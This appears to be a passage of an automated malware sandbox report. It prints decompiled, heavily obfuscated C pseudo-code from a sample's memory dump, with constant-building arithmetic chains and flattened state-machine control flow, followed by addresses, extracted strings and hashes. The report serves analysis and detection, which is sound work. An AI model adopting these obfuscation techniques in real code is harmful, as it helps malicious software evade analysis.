				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00D4FE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
				_v1644 = _v1644 ^ 0x280f1fa3;
				_v1644 = _v1644 | 0x80dcb776;
				_v1644 = _v1644 ^ 0xa8d7b48e;
				_v1612 = 0x310401;
				_v1612 = _v1612 << 0xc;
				_v1612 = _v1612 ^ 0x10456323;
				_v1708 = 0xec7d3e;
				_v1708 = _v1708 + 0xffff4756;
				_t465 = 0x19;
				_v1708 = _v1708 / _t465;
				_v1708 = _v1708 * 0x78;
				_v1708 = _v1708 ^ 0x04625198;
				_v1676 = 0xc1499c;
				_v1676 = _v1676 + 0x787f;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 >> 0xd;
				_v1676 = _v1676 ^ 0x0006bbad;
				_v1620 = 0xc8864f;
				_v1620 = _v1620 + 0xdb64;
				_t466 = 0x71;
				_v1620 = _v1620 / _t466;
				_v1620 = _v1620 ^ 0x00054ec4;
				_v1716 = 0x58bfc6;
				_v1716 = _v1716 << 0xc;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 >> 0xa;
				_v1716 = _v1716 ^ 0x00309503;
				_v1584 = 0x2a66b4;
				_t467 = 0x6c;
				_v1584 = _v1584 * 0x62;
				_v1584 = _v1584 ^ 0x103c6d70;
				_v1628 = 0xcd0e9a;
				_v1628 = _v1628 + 0xffff6b98;
				_v1628 = _v1628 + 0xffffdc7c;
				_v1628 = _v1628 ^ 0x00cd4883;
				_v1684 = 0x7bfe73;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 * 0x31;
				_v1684 = _v1684 ^ 0x5ee8daf9;
				_v1660 = 0x1f1c01;
				_v1660 = _v1660 >> 4;
				_v1660 = _v1660 / _t467;
				_v1660 = _v1660 ^ 0x000ccbd2;
				_v1720 = 0x840fb2;
				_v1720 = _v1720 | 0xa69eff81;
				_v1720 = _v1720 << 0xe;
				_v1720 = _v1720 + 0xffff3037;
				_v1720 = _v1720 ^ 0xbfecb97e;
				_v1656 = 0xd8a297;
				_v1656 = _v1656 + 0x41c1;
				_v1656 = _v1656 ^ 0x1d9d441b;
				_v1656 = _v1656 ^ 0x1d437da6;
				_v1580 = 0xe77586;
				_v1580 = _v1580 + 0xfffff7e8;
				_v1580 = _v1580 ^ 0x00e53b2f;
				_v1728 = 0x20c0e;
				_v1728 = _v1728 + 0x594f;
				_t468 = 0x79;
				_v1728 = _v1728 / _t468;
				_v1728 = _v1728 ^ 0x017ec3a2;
				_v1728 = _v1728 ^ 0x01734834;
				_v1712 = 0x467deb;
				_v1712 = _v1712 | 0xfb06902d;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 0xb;
				_v1712 = _v1712 ^ 0xef0dc14e;
				_v1632 = 0xa85c1c;
				_v1632 = _v1632 << 3;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x54293107;
				_v1596 = 0x697bfe;
				_v1596 = _v1596 | 0x748d72c7;
				_v1596 = _v1596 ^ 0x74e3de32;
				_v1640 = 0x724245;
				_t222 =  &_v1640; // 0x724245
				_v1640 =  *_t222 * 0x4c;
				_t224 =  &_v1640; // 0x724245
				_v1640 =  *_t224 * 0x26;
				_v1640 = _v1640 ^ 0x08f66fe6;
				_v1648 = 0xa241b2;
				_v1648 = _v1648 >> 4;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x890355d2;
				_v1604 = 0x4e61c6;
				_v1604 = _v1604 | 0x297abf50;
				_v1604 = _v1604 ^ 0x29742082;
				_v1608 = 0xdfdd08;
				_v1608 = _v1608 | 0x096e656f;
				_v1608 = _v1608 ^ 0x09fe8e74;
				_v1624 = 0x7e1789;
				_v1624 = _v1624 + 0xd6ac;
				_v1624 = _v1624 + 0xffff1ac7;
				_v1624 = _v1624 ^ 0x007fce14;
				_v1688 = 0xd4150c;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 ^ 0x561d7592;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x001f305a;
				_v1696 = 0x3e923d;
				_v1696 = _v1696 ^ 0x624df4c6;
				_t469 = 0x29;
				_v1696 = _v1696 / _t469;
				_v1696 = _v1696 + 0xffffe680;
				_v1696 = _v1696 ^ 0x026755ff;
				_v1704 = 0xed73af;
				_t470 = 0x36;
				_v1704 = _v1704 / _t470;
				_v1704 = _v1704 * 0x76;
				_v1704 = _v1704 >> 3;
				_v1704 = _v1704 ^ 0x0041c6e0;
				_v1664 = 0xe0489c;
				_v1664 = _v1664 * 0x4e;
				_v1664 = _v1664 * 0x21;
				_v1664 = _v1664 << 0xf;
				_v1664 = _v1664 ^ 0x084e6c7b;
				_v1672 = 0xcef4bd;
				_v1672 = _v1672 * 0x4b;
				_v1672 = _v1672 + 0xffff3dcb;
				_v1672 = _v1672 << 0x10;
				_v1672 = _v1672 ^ 0xf1249f73;
				_v1680 = 0x187dc5;
				_v1680 = _v1680 | 0x94fddf65;
				_v1680 = _v1680 << 1;
				_v1680 = _v1680 ^ 0x244f0190;
				_v1680 = _v1680 ^ 0x0db75cb9;
				_v1616 = 0xe6e563;
				_v1616 = _v1616 ^ 0xa5d4beb7;
				_v1616 = _v1616 + 0xffffcebd;
				_v1616 = _v1616 ^ 0xa53dba5b;
				do {
					while(_t425 != 0x6a96cc9) {
						if(_t425 == 0xabcd6f9) {
							_push(_t425);
							__eflags = E00D485FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
							_t462 =  !=  ? 1 : _t462;
						} else {
							if(_t425 == 0xbbc45e7) {
								E00D31A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
								_t475 =  &(_t475[8]);
								_t425 = 0xe9b1f6b;
								continue;
							} else {
								_t482 = _t425 - 0xe9b1f6b;
								if(_t425 != 0xe9b1f6b) {
									goto L8;
								} else {
									_push(_v1644);
									_push(_v1724);
									_push(_v1652);
									_t412 = E00D4E1F8(0xd31030, _v1692, _t482);
									E00D37078( &_v1560, _t482);
									_t415 =  *0xd56214; // 0x0
									_t419 =  *0xd56214; // 0x0
									E00D3F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
									E00D4FECB(_t412, _v1584, _v1628, _v1684, _v1660);
									_t475 =  &(_t475[0x10]);
									_t425 = 0xabcd6f9;
									continue;
								}
							}
						}
						L11:
						return _t462;
					}
					_push(_v1728);
					_t346 =  &_v1580; // 0xe53b2f
					_push( *_t346);
					_push(_v1656);
					_t397 = E00D4E1F8(0xd310f0, _v1720, __eflags);
					E00D37078( &_v1560, __eflags);
					_t400 =  *0xd56214; // 0x0
					_t402 =  *0xd56214; // 0x0
					__eflags = _t402 + 0x23c;
					E00D3BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
					E00D4FECB(_t397, _v1624, _v1688, _v1696, _v1704);
					_t475 =  &(_t475[0x13]);
					_t425 = 0xabcd6f9;
					L8:
					__eflags = _t425 - 0xcc0d361;
				} while (__eflags != 0);
				goto L11;
			}

0x00d517c7
0x00d517ce
0x00d517d0
0x00d517d7
0x00d517d8
0x00d517d9
0x00d517de
0x00d517e9
0x00d517ec
0x00d517f9
0x00d51804
0x00d51809
0x00d51810
0x00d51818
0x00d51820
0x00d51828
0x00d51830
0x00d51844
0x00d51849
0x00d51852
0x00d5185d
0x00d51868
0x00d51873
0x00d5187e
0x00d51886
0x00d5188b
0x00d51893
0x00d5189b
0x00d518a3
0x00d518ab
0x00d518b0
0x00d518b8
0x00d518bd
0x00d518c5
0x00d518d0
0x00d518d8
0x00d518e3
0x00d518eb
0x00d518f3
0x00d518f8
0x00d51900
0x00d51908
0x00d51910
0x00d5191d
0x00d51920
0x00d51924
0x00d5192c
0x00d51934
0x00d5193c
0x00d5194c
0x00d51950
0x00d51958
0x00d51960
0x00d51968
0x00d51970
0x00d51978
0x00d51983
0x00d5198b
0x00d51996
0x00d5199e
0x00d519aa
0x00d519ad
0x00d519b6
0x00d519ba
0x00d519c4
0x00d519cc
0x00d519d4
0x00d519d9
0x00d519de
0x00d519e6
0x00d519ee
0x00d519fc
0x00d51a01
0x00d51a0a
0x00d51a15
0x00d51a1d
0x00d51a22
0x00d51a27
0x00d51a2c
0x00d51a34
0x00d51a47
0x00d51a4a
0x00d51a51
0x00d51a5c
0x00d51a64
0x00d51a6c
0x00d51a74
0x00d51a7c
0x00d51a84
0x00d51a89
0x00d51a93
0x00d51a97
0x00d51a9f
0x00d51aa7
0x00d51ab4
0x00d51ab8
0x00d51ac0
0x00d51ac8
0x00d51ad0
0x00d51ad5
0x00d51add
0x00d51ae5
0x00d51aed
0x00d51af5
0x00d51afd
0x00d51b05
0x00d51b10
0x00d51b1b
0x00d51b26
0x00d51b2e
0x00d51b3a
0x00d51b3d
0x00d51b41
0x00d51b49
0x00d51b51
0x00d51b59
0x00d51b61
0x00d51b66
0x00d51b6b
0x00d51b73
0x00d51b7b
0x00d51b80
0x00d51b85
0x00d51b8d
0x00d51b98
0x00d51ba3
0x00d51bae
0x00d51bb6
0x00d51bbb
0x00d51bbf
0x00d51bc4
0x00d51bca
0x00d51bd7
0x00d51be4
0x00d51be9
0x00d51bee
0x00d51bf6
0x00d51c01
0x00d51c0c
0x00d51c17
0x00d51c22
0x00d51c2d
0x00d51c38
0x00d51c40
0x00d51c48
0x00d51c50
0x00d51c58
0x00d51c60
0x00d51c65
0x00d51c6d
0x00d51c72
0x00d51c7a
0x00d51c82
0x00d51c90
0x00d51c95
0x00d51c9b
0x00d51ca3
0x00d51cab
0x00d51cb7
0x00d51cba
0x00d51cc3
0x00d51cc7
0x00d51ccc
0x00d51cd4
0x00d51ce1
0x00d51cea
0x00d51cee
0x00d51cf3
0x00d51cfb
0x00d51d08
0x00d51d0c
0x00d51d14
0x00d51d19
0x00d51d21
0x00d51d29
0x00d51d31
0x00d51d35
0x00d51d3d
0x00d51d45
0x00d51d50
0x00d51d5b
0x00d51d66
0x00d51d71
0x00d51d71
0x00d51d7f
0x00d51f31
0x00d51f5b
0x00d51f5d
0x00d51d85
0x00d51d8b
0x00d51e67
0x00d51e6c
0x00d51e6f
0x00000000
0x00d51d91
0x00d51d91
0x00d51d93
0x00000000
0x00d51d99
0x00d51d99
0x00d51da2
0x00d51da6
0x00d51dae
0x00d51dbc
0x00d51ddd
0x00d51e03
0x00d51e0d
0x00d51e2d
0x00d51e32
0x00d51e35
0x00000000
0x00d51e35
0x00d51d93
0x00d51d8b
0x00d51f60
0x00d51f6c
0x00d51f6c
0x00d51e76
0x00d51e7f
0x00d51e7f
0x00d51e86
0x00d51e8e
0x00d51e9f
0x00d51ebb
0x00d51ec8
0x00d51ecd
0x00d51eff
0x00d51f19
0x00d51f1e
0x00d51f21
0x00d51f23
0x00d51f23
0x00d51f23
0x00000000

Strings

EBr, xrefs: 00D51BB6
OY, xrefs: 00D51B2E
oen, xrefs: 00D51C22
>}, xrefs: 00D51996
/;, xrefs: 00D51E7F
c, xrefs: 00D51D45
}F, xrefs: 00D51B51

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /;$>}$EBr$OY$c$oen$}F
API String ID: 0-419207597
Opcode ID: 43108b1f803d510538acc92f65f388f524d1569aa1d14e9d46e2b22fbd40fc9b
Instruction ID: 74efcc0afff2537be4f0d24960ffdf7777a134459fcd3aa78b776bd940dc2be1
Opcode Fuzzy Hash: 43108b1f803d510538acc92f65f388f524d1569aa1d14e9d46e2b22fbd40fc9b
Instruction Fuzzy Hash: B40202B15083809BD764CF25C88AA8BBBE1FBC4358F104A1DF6CA96260D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D377A3, Relevance: 9.1, Strings: 7, Instructions: 330
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00D377A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t314;
				signed int _t352;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t370;
				signed int* _t401;
				signed int* _t405;
				void* _t407;

				_t402 = _a12;
				_push(_a12);
				_push(_a8);
				_t401 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00D4FE29(_t314);
				_v100 = 0xaefbe1;
				_t405 =  &(( &_v192)[5]);
				_v100 = _v100 + 0x6b82;
				_t370 = 0xc5526f;
				_t362 = 0x2b;
				_v100 = _v100 / _t362;
				_v100 = _v100 ^ 0x00041443;
				_v80 = 0x1d3414;
				_v80 = _v80 + 0xffffdb02;
				_v80 = _v80 ^ 0x0011ba60;
				_v72 = 0x54a5f8;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x000d0ae3;
				_v136 = 0x274773;
				_t26 =  &_v136; // 0x274773
				_t363 = 0x1a;
				_v136 =  *_t26 * 0x4d;
				_v136 = _v136 + 0xffff9993;
				_v136 = _v136 ^ 0x0bd1637a;
				_v88 = 0xd58b4c;
				_v88 = _v88 + 0xffff1506;
				_v88 = _v88 ^ 0x00d01948;
				_v92 = 0x5e6930;
				_t38 =  &_v92; // 0x5e6930
				_v92 =  *_t38;
				_v92 = _v92 ^ 0x00540f59;
				_v116 = 0x40a51;
				_v116 = _v116 | 0x5ce3fa4e;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x1737f89e;
				_v108 = 0x7d5bec;
				_v108 = _v108 | 0x0f0c5889;
				_v108 = _v108 + 0xbcf5;
				_v108 = _v108 ^ 0x0f7d2458;
				_v164 = 0x3d5dd8;
				_v164 = _v164 ^ 0x644c870b;
				_v164 = _v164 >> 0xd;
				_v164 = _v164 * 0x7a;
				_v164 = _v164 ^ 0x017eec74;
				_v180 = 0x53df1b;
				_v180 = _v180 / _t363;
				_v180 = _v180 + 0xffff91ff;
				_v180 = _v180 + 0xffff90b6;
				_v180 = _v180 ^ 0x000d2df2;
				_v76 = 0x6cb33c;
				_v76 = _v76 + 0x7c19;
				_v76 = _v76 ^ 0x0065748e;
				_v160 = 0xaee8e0;
				_t364 = 0x3e;
				_v160 = _v160 / _t364;
				_v160 = _v160 + 0x21f3;
				_v160 = _v160 * 0x52;
				_v160 = _v160 ^ 0x00ffda9d;
				_v84 = 0xdaab99;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x000be4ff;
				_v144 = 0x6cc9e4;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0xa5290d0e;
				_v144 = _v144 ^ 0xa52e4d3d;
				_v120 = 0x3bbeb9;
				_v120 = _v120 ^ 0x393aef05;
				_v120 = _v120 + 0x22c7;
				_v120 = _v120 ^ 0x39070acc;
				_v148 = 0xc13163;
				_v148 = _v148 ^ 0x61e09c7e;
				_v148 = _v148 + 0x1cd6;
				_v148 = _v148 ^ 0x612c2d34;
				_v128 = 0x26c56f;
				_v128 = _v128 >> 2;
				_v128 = _v128 | 0xf6250b40;
				_v128 = _v128 ^ 0xf621b77e;
				_v176 = 0xf92ffc;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0x602a8fe3;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x00d9f38d;
				_v124 = 0x433c84;
				_v124 = _v124 + 0xffff4128;
				_v124 = _v124 ^ 0x1ed7562a;
				_v124 = _v124 ^ 0x1e92a094;
				_v132 = 0x6b8ec6;
				_v132 = _v132 ^ 0x28d18ae0;
				_t365 = 0x6a;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 ^ 0x9158c057;
				_v104 = 0x1fefeb;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 + 0xffff5efe;
				_v104 = _v104 ^ 0xfff4cbde;
				_v168 = 0xc1bc7b;
				_v168 = _v168 >> 3;
				_v168 = _v168 << 7;
				_v168 = _v168 * 0x7d;
				_v168 = _v168 ^ 0xe998ae80;
				_v64 = 0x9d5223;
				_v64 = _v64 | 0x29ada36c;
				_v64 = _v64 ^ 0x29b66376;
				_v184 = 0x42d2c5;
				_v184 = _v184 + 0xffffd8f9;
				_v184 = _v184 | 0x10a03a14;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xe2b073c1;
				_v192 = 0xa502eb;
				_v192 = _v192 ^ 0xb81d0436;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 / _t365;
				_v192 = _v192 ^ 0x000463de;
				_v172 = 0x9c405d;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x75940441;
				_v172 = _v172 + 0xd268;
				_v172 = _v172 ^ 0x759b0547;
				_v156 = 0x9f3fdd;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 9;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x000ada21;
				_v188 = 0xfbaf85;
				_v188 = _v188 | 0xf8737d3a;
				_t366 = 0x3c;
				_v188 = _v188 / _t366;
				_v188 = _v188 ^ 0x0422aead;
				_v112 = 0x7705bd;
				_v112 = _v112 | 0xb4ba0e14;
				_v112 = _v112 * 0x43;
				_v112 = _v112 ^ 0x5ec93514;
				_v96 = 0xe3e42a;
				_v96 = _v96 ^ 0x25c7ee45;
				_v96 = _v96 ^ 0x252c54ca;
				_v68 = 0xae646d;
				_v68 = _v68 + 0xcc0;
				_v68 = _v68 ^ 0x00a4113a;
				_v140 = 0x4c7529;
				_t367 = 0x73;
				_v140 = _v140 / _t367;
				_v140 = _v140 | 0x6ffaa740;
				_v140 = _v140 ^ 0x6ff9ac12;
				_v152 = 0xafca7f;
				_v152 = _v152 + 0xfffffd29;
				_v152 = _v152 + 0xad57;
				_v152 = _v152 + 0x26e2;
				_v152 = _v152 ^ 0x00ba4152;
				goto L1;
				do {
					while(1) {
						L1:
						_t407 = _t370 - 0x696b508;
						if(_t407 > 0) {
							break;
						}
						if(_t407 == 0) {
							_t401[1] = E00D3F369(_t402);
							_t370 = 0x4c1a8a5;
							continue;
						} else {
							if(_t370 == 0xc5526f) {
								_t370 = 0x696b508;
								 *_t401 =  *_t401 & 0x00000000;
								_t401[1] = _v100;
								continue;
							} else {
								if(_t370 == 0x1aa419f) {
									E00D40A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
									_t405 =  &(_t405[4]);
									_t370 = 0x68c33a9;
									continue;
								} else {
									if(_t370 == 0x4c1a8a5) {
										_push(_t370);
										_push(_t370);
										_t352 = E00D3C5D8(_t401[1]);
										_t405 =  &(_t405[3]);
										 *_t401 = _t352;
										__eflags = _t352;
										if(__eflags != 0) {
											_t370 = 0x8344534;
											continue;
										}
									} else {
										if(_t370 == 0x642ef10) {
											E00D4CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
											_t405 =  &(_t405[3]);
											_t370 = 0x7d262d1;
											continue;
										} else {
											if(_t370 != 0x68c33a9) {
												goto L25;
											} else {
												E00D40A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
												_t405 =  &(_t405[4]);
												_t370 = 0x6a3d126;
												continue;
											}
										}
									}
								}
							}
						}
						goto L26;
					}
					__eflags = _t370 - 0x6a3d126;
					if(__eflags == 0) {
						E00D4CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
						_t405 =  &(_t405[3]);
						_t370 = 0x2431b15;
						goto L25;
					} else {
						__eflags = _t370 - 0x7d262d1;
						if(_t370 == 0x7d262d1) {
							E00D40A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
							_t405 =  &(_t405[4]);
							_t370 = 0xabb5672;
							goto L1;
						} else {
							__eflags = _t370 - 0x8344534;
							if(_t370 == 0x8344534) {
								E00D322A6(_t401, _v92,  &_v60, _v116);
								_t405 =  &(_t405[2]);
								_t370 = 0x642ef10;
								goto L1;
							} else {
								__eflags = _t370 - 0x94f1f5a;
								if(_t370 == 0x94f1f5a) {
									E00D40A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
									_t405 =  &(_t405[4]);
									_t370 = 0x1aa419f;
									goto L1;
								} else {
									__eflags = _t370 - 0xabb5672;
									if(_t370 != 0xabb5672) {
										goto L25;
									} else {
										E00D40A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
										_t405 =  &(_t405[4]);
										_t370 = 0x94f1f5a;
										goto L1;
									}
								}
							}
						}
					}
					break;
					L25:
					__eflags = _t370 - 0x2431b15;
				} while (__eflags != 0);
				L26:
				__eflags =  *_t401;
				_t313 =  *_t401 != 0;
				__eflags = _t313;
				return 0 | _t313;
			}

0x00d377ac
0x00d377b4
0x00d377b5
0x00d377bc
0x00d377be
0x00d377c6
0x00d377c7
0x00d377cc
0x00d377d7
0x00d377da
0x00d377e8
0x00d377ef
0x00d377f4
0x00d377fa
0x00d37802
0x00d3780d
0x00d37818
0x00d37823
0x00d3782e
0x00d37836
0x00d37841
0x00d37849
0x00d3784e
0x00d37851
0x00d37855
0x00d3785d
0x00d37865
0x00d3786d
0x00d37875
0x00d3787d
0x00d37885
0x00d37889
0x00d3788d
0x00d37895
0x00d3789d
0x00d378a5
0x00d378aa
0x00d378b2
0x00d378ba
0x00d378c2
0x00d378ca
0x00d378d2
0x00d378da
0x00d378e2
0x00d378ec
0x00d378f0
0x00d378f8
0x00d37908
0x00d3790c
0x00d37914
0x00d3791c
0x00d37924
0x00d3792f
0x00d3793a
0x00d37945
0x00d37951
0x00d37954
0x00d37958
0x00d37965
0x00d37969
0x00d37971
0x00d37979
0x00d3797e
0x00d37988
0x00d37990
0x00d37995
0x00d3799d
0x00d379a5
0x00d379ad
0x00d379b5
0x00d379bd
0x00d379c5
0x00d379cd
0x00d379d5
0x00d379dd
0x00d379e5
0x00d379ed
0x00d379f2
0x00d379fa
0x00d37a02
0x00d37a0a
0x00d37a0f
0x00d37a17
0x00d37a1c
0x00d37a24
0x00d37a2c
0x00d37a34
0x00d37a3c
0x00d37a44
0x00d37a4c
0x00d37a5b
0x00d37a5e
0x00d37a62
0x00d37a6a
0x00d37a72
0x00d37a77
0x00d37a7f
0x00d37a87
0x00d37a8f
0x00d37a94
0x00d37a9e
0x00d37aa2
0x00d37aaa
0x00d37ab5
0x00d37ac0
0x00d37acb
0x00d37ad3
0x00d37adb
0x00d37ae3
0x00d37ae8
0x00d37af0
0x00d37af8
0x00d37b00
0x00d37b0d
0x00d37b11
0x00d37b19
0x00d37b21
0x00d37b26
0x00d37b2e
0x00d37b36
0x00d37b3e
0x00d37b46
0x00d37b4b
0x00d37b50
0x00d37b55
0x00d37b5d
0x00d37b65
0x00d37b71
0x00d37b74
0x00d37b78
0x00d37b80
0x00d37b88
0x00d37b95
0x00d37b9b
0x00d37ba8
0x00d37bb0
0x00d37bb8
0x00d37bc0
0x00d37bcb
0x00d37bd6
0x00d37be1
0x00d37bef
0x00d37bf7
0x00d37bfb
0x00d37c03
0x00d37c0b
0x00d37c13
0x00d37c1b
0x00d37c23
0x00d37c2b
0x00d37c2b
0x00d37c33
0x00d37c33
0x00d37c33
0x00d37c33
0x00d37c35
0x00000000
0x00000000
0x00d37c3b
0x00d37d45
0x00d37d48
0x00000000
0x00d37c41
0x00d37c47
0x00d37d31
0x00d37d33
0x00d37d36
0x00000000
0x00d37c4d
0x00d37c53
0x00d37d1b
0x00d37d20
0x00d37d23
0x00000000
0x00d37c59
0x00d37c5f
0x00d37cdf
0x00d37ce0
0x00d37ce4
0x00d37ce9
0x00d37cec
0x00d37cee
0x00d37cf0
0x00d37cf6
0x00000000
0x00d37cf6
0x00d37c61
0x00d37c67
0x00d37cb7
0x00d37cbc
0x00d37cbf
0x00000000
0x00d37c69
0x00d37c6f
0x00000000
0x00d37c75
0x00d37c90
0x00d37c95
0x00d37c98
0x00000000
0x00d37c98
0x00d37c6f
0x00d37c67
0x00d37c5f
0x00d37c53
0x00d37c47
0x00000000
0x00d37c3b
0x00d37d52
0x00d37d58
0x00d37e4e
0x00d37e53
0x00d37e56
0x00000000
0x00d37d5e
0x00d37d5e
0x00d37d64
0x00d37e21
0x00d37e26
0x00d37e29
0x00000000
0x00d37d6a
0x00d37d6a
0x00d37d6c
0x00d37dee
0x00d37df3
0x00d37df6
0x00000000
0x00d37d6e
0x00d37d6e
0x00d37d74
0x00d37dca
0x00d37dcf
0x00d37dd2
0x00000000
0x00d37d76
0x00d37d76
0x00d37d7c
0x00000000
0x00d37d82
0x00d37d9d
0x00d37da2
0x00d37da5
0x00000000
0x00d37da5
0x00d37d7c
0x00d37d74
0x00d37d6c
0x00d37d64
0x00000000
0x00d37e5b
0x00d37e5b
0x00d37e5b
0x00d37e67
0x00d37e69
0x00d37e6e
0x00d37e6e
0x00d37e78

Strings

&, xrefs: 00D37C23
4-,a, xrefs: 00D379DD
)uL, xrefs: 00D37BE1
sG', xrefs: 00D37849
0i^, xrefs: 00D37885
[}, xrefs: 00D378B2
*, xrefs: 00D37BA8

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )uL$*$0i^$4-,a$sG'$&$[}
API String ID: 0-4036371101
Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction ID: 6f1e85f244d8d5bfe10f10c35e6fd2c35d1018aea2a9ff848e7f247a002a4391
Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
Instruction Fuzzy Hash: 98F132B1508785DFD3A8CF21C48AA5BBBF1FB94308F50891DF69A86220D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D36B7A, Relevance: 9.0, Strings: 7, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00D36B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t242;
